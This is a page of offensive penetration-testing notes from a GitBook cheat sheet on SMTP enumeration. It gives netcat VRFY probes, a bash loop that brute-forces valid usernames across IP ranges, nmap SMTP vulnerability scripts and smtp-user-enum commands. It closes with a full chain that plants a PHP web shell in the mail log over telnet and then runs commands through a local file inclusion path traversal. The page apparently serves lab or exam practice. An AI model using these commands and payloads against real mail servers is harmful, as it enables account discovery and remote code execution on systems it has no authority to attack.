Hack$Notes
  • Hack$Notes
  • Enumeration
    • NMAP Scanning
    • Hping3 Scanning
      • IDLE SCAN
    • DNS Enum
    • SMB Enum
    • SMTP Enum
    • POP3
    • SNMP Enum
    • LDAP Enum
    • HTTP Enum
      • CheckList
    • FTP Enum
    • SSH Enum
    • MySQL Enum
    • Oracle Enum
    • NFS Enum
    • Internet Relay Chat (IRC)
    • Telnet
    • Kerberos
    • Finger
    • Ports Open/Close
    • ident
    • Postgresl
  • Transferring Files
  • Metasploit Framework
    • Msfvenom tutorial
    • Msfvenom Payloads
  • Reverse Shells
  • Buffer Overflow
    • B.O Steps
    • SLmail B.O
  • Spawning a Shell
  • Password Attacks
    • Passing the Hash
    • SAM/SYSTEM
    • Passwords
    • Hydra
    • Medusa
    • Ncrack
    • Unshadow
    • Hashcat
    • John The Ripper
    • fcrackzip
  • Privilege Escalation
    • Windows
      • Kernel Exploits
      • Stored Credentials
      • Unquoted Service Path
      • Always Install Elevated
      • Weak Permissions
      • Schedule Tasks
      • AutoRun Executables
      • Startup Apps
      • Passwords
      • Win PrivEsc Tools
    • Linux
      • Kernel Exploits
      • Service Exploits
      • PATH Variable
      • SUID/GUID files
      • CronJobs
      • Sudo
      • Custom Executable
      • Linux PrivEsc Tools
  • Port Forwarding
  • Tools / Techniques
    • General Check List
    • Misc. Commands
    • Steganography
    • Evasion Techniques
    • SQL Injection Payloads
    • LFI / RFI
    • Recover contents
    • JAR Files
    • Strace/Ltrace
    • Port Knocking
    • Screenshots in Kali
    • Curl
  • Resources
    • Books
    • Links
Powered by GitBook
On this page
  • CheckList
  • Grab the banner and VRFY
  • Bash Script for SMTP
  • SMTP nmap scripts
  • SMTP user enum
  • Code Execution through SMTP/LFI

Was this helpful?

  1. Enumeration

SMTP Enum

CheckList

  • Check for version

  • LFI chaining log file poisoning

  • User enumeration

Grab the banner and VRFY

nc -nv 10.11.12.8 25 
VRFY bob 
250 2.1.5 
bob@redhat.active.com                  <--- Output if user exists
 
VRFY idontexist 
550 5.1.1 idontexist... User unknow    <--- Output if user does not exist 

EXPN request: asks the server for the membership of a mailing list

Bash Script for SMTP

#!/bin/bash

# VRFY Script
#############

for ips in $(cat numbers.txt);			# numbers.txt list of IP's
do
	for user in $(cat users.txt);       # users.txt list of usernames
	do 
		echo VRFY $user | nc -nv -w 1 10.11.1.$ips 25 2>/dev/null |grep ^"250"
	done
done

SMTP nmap scripts

nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1

SMTP user enum

smtp-user-enum -M VRFY -D domain.here -u username -t 10.10.10.10
smtp-user-enum -M VRFY -U usernamelist.txt -t 10.10.10.10

Code Execution through SMTP/LFI

telnet 10.10.10.10 25
EHLO sub.somedomain.com
VRFY username@localhost
mail from:someself@nodomain.io
rcpt to: username@localhost
data
Subject: Some Subject
<?php echo system($_REQUEST['cmd']); ?>

.

=================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id 

Examples:
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=whoami
PreviousSMB EnumNextPOP3

Last updated 3 years ago

Was this helpful?